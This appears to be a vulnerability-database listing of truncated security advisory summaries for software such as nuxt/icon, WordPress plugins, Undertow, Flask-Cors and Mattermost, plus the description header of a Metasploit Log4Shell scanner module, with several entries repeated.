CVE-2024-42352

Nuxt is a free and open-source framework to create full-stack web applications and websites with Vue.js. nuxt/icon provides an API to allow client side icon lookup. This endpoint is at /api/nuxticon/name. The proxied request path is improperly parsed, allowing an attacker to change the scheme and...

CVE-2024-9204

The Smart Custom 404 Error Page plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via $SERVER'REQUESTURI' in all versions up to, and including, 11.4.7 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject...

CVE-2024-6018

The Music Request Manager WordPress plugin through 1.3 does not escape the $SERVER'REQUESTURI' parameter before outputting it back in an attribute, which could lead to Reflected Cross-Site Scripting in old web browsers...

Log4Shell HTTP Scanner

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Log4Shell HTTP Scanner', 'Description' = %q Versions of Apache Log4j2 impacted by CVE-2021-44228 which allow JNDI features used in configuration,...

SourceCodester Tracking Monitoring Management System SQL注入漏洞

SourceCodester Tracking Monitoring Management System is a monitoring management system from SourceCodester Inc. A SQL injection vulnerability exists in SourceCodester Tracking Monitoring Management System version 1.0, which is caused by an SQL injection vulnerability in the id parameter of the...

PT-2024-37090 · WordPress · If-So Dynamic Content Personalization

Name of the Vulnerable Software and Affected Versions: If-So Dynamic Content Personalization WordPress plugin versions prior to 1.8.0.4 Description: The issue is related to Reflected Cross-Site Scripting in old web browsers due to the failure to escape the $ SERVER'REQUEST URI' parameter before...

Undertow's url-encoded request path information can be broken on ajp-listener

A vulnerability was found in Undertow, where URL-encoded request paths can be mishandled during concurrent requests on the AJP listener. This issue arises because the same buffer is used to decode the paths for multiple requests simultaneously, leading to incorrect path information being processe...

GHSA-9442-GM4V-R222 Undertow's url-encoded request path information can be broken on ajp-listener

A vulnerability was found in Undertow, where URL-encoded request paths can be mishandled during concurrent requests on the AJP listener. This issue arises because the same buffer is used to decode the paths for multiple requests simultaneously, leading to incorrect path information being processe...

CVE-2024-6162

A vulnerability was found in Undertow, where URL-encoded request paths can be mishandled during concurrent requests on the AJP listener. This issue arises because the same buffer is used to decode the paths for multiple requests simultaneously, leading to incorrect path information being processe...

CVE-2024-6162

A vulnerability was found in Undertow, where URL-encoded request paths can be mishandled during concurrent requests on the AJP listener. This issue arises because the same buffer is used to decode the paths for multiple requests simultaneously, leading to incorrect path information being processe...

CVE-2024-6162

CVE-2024-6162 – Undertow URL path handling issue : A buffer reuse bug in Undertow’s AJP listener can mishandle URL-encoded request paths under concurrent requests, causing path information to be mixed up. This may lead the server to access the wrong path, generating errors like 404 and potentiall...

CVE-2024-6162 Undertow: url-encoded request path information can be broken on ajp-listener

A vulnerability was found in Undertow, where URL-encoded request paths can be mishandled during concurrent requests on the AJP listener. This issue arises because the same buffer is used to decode the paths for multiple requests simultaneously, leading to incorrect path information being processe...

CVE-2024-6162 Undertow: url-encoded request path information can be broken on ajp-listener

A vulnerability was found in Undertow, where URL-encoded request paths can be mishandled during concurrent requests on the AJP listener. This issue arises because the same buffer is used to decode the paths for multiple requests simultaneously, leading to incorrect path information being processe...

OESA-2024-1713 python-Flask-Cors security update

A Flask extension for handling Cross Origin Resource Sharing CORS, making cross-origin AJAX possible. Security Fixes: corydolphin/flask-cors is vulnerable to log injection when the log level is set to debug. An attacker can inject fake log entries into the log file by sending a specially crafted...

GO-2024-2796 Mattermost fails to limit the size of a request path in github.com/mattermost/mattermost-server

Mattermost fails to limit the size of a request path in github.com/mattermost/mattermost-server...

CVE-2024-22091

A flaw was found in Mattermost, where it failed to limit the size of a request path that includes user inputs. This flaw allows an attacker to cause excessive resource consumption, possibly leading to a denial of service DoS via sending large request paths...

Mattermost fails to limit the size of a request path

Mattermost versions 8.1.x = 8.1.10, 9.6.x = 9.6.0, 9.5.x = 9.5.2 and 8.1.x = 8.1.11 fail to limit the size of a request path that includes user inputs which allows an attacker to cause excessive resource consumption, possibly leading to a DoS via sending large request paths...

CVE-2024-22091 Excessive resource consumption due to lack to request path size limits

Mattermost versions 8.1.x = 8.1.10, 9.6.x = 9.6.0, 9.5.x = 9.5.2 and 8.1.x = 8.1.11 fail to limit the size of a request path that includes user inputs which allows an attacker to cause excessive resource consumption, possibly leading to a DoS via sending large request paths...

CVE-2024-22091

CVE-2024-22091 affects Mattermost servers where the path of requests containing user inputs is not length-limited. The root cause is an insufficient limit on the size of request paths, which can trigger excessive resource consumption and potentially cause a DoS. Affected versions include Mattermo...

CVE-2024-22091 Excessive resource consumption due to lack to request path size limits

Mattermost versions 8.1.x = 8.1.10, 9.6.x = 9.6.0, 9.5.x = 9.5.2 and 8.1.x = 8.1.11 fail to limit the size of a request path that includes user inputs which allows an attacker to cause excessive resource consumption, possibly leading to a DoS via sending large request paths...